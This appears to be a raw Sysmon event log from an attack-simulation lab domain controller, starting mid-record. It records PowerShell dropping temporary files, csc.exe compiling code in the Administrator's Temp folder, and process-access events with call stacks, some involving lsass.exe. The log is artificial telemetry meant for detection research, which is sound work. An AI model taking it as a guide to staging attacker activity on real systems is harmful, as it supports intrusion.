IAYQBwAHAAZQByAA== 11241100x8000000000000000256Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:25.134{10ACEC4A-8518-5FCF-CC02-000000009001}4904C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\pth4thaf.cmdline2020-12-08 13:52:25.134 11241100x8000000000000000255Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:52:25.134{10ACEC4A-8518-5FCF-CC02-000000009001}4904C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\pth4thaf.dll2020-12-08 13:52:25.134 11241100x8000000000000000413Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:52:26.774{10ACEC4A-851A-5FCF-D602-000000009001}5040C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\4so5fo5s.dll2020-12-08 13:52:26.602 10341000x8000000000000000412Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:26.759{10ACEC4A-8519-5FCF-D102-000000009001}48362632C:\Windows\system32\conhost.exe{10ACEC4A-851A-5FCF-D702-000000009001}4812C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000411Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:26.759{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000410Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:26.759{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000409Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:26.759{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000408Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:26.759{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000407Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:26.759{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000406Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:26.759{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000405Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:26.759{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000404Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:26.759{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000403Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:26.759{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000402Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:26.759{10ACEC4A-83AA-5FCF-0500-000000009001}640760C:\Windows\system32\csrss.exe{10ACEC4A-851A-5FCF-D702-000000009001}4812C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000401Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:26.759{10ACEC4A-851A-5FCF-D602-000000009001}50404496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{10ACEC4A-851A-5FCF-D702-000000009001}4812C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000400Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:26.767{10ACEC4A-851A-5FCF-D702-000000009001}4812C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESB31B.tmp" "c:\Users\Administrator\AppData\Local\Temp\CSCBC4850CCE6E94972A6F5F764749A8BA0.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-8519-5FCF-C3B8-100000000000}0x10b8c30HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{10ACEC4A-851A-5FCF-D602-000000009001}5040C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\4so5fo5s.cmdline" 10341000x8000000000000000399Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:26.712{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000398Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:26.712{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000397Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:26.712{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000396Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:26.602{10ACEC4A-8519-5FCF-D102-000000009001}48362632C:\Windows\system32\conhost.exe{10ACEC4A-851A-5FCF-D602-000000009001}5040C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000395Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:26.602{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000394Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:26.602{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000393Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:26.602{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000392Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:26.602{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000391Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:26.602{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000390Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:26.602{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000389Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:26.602{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 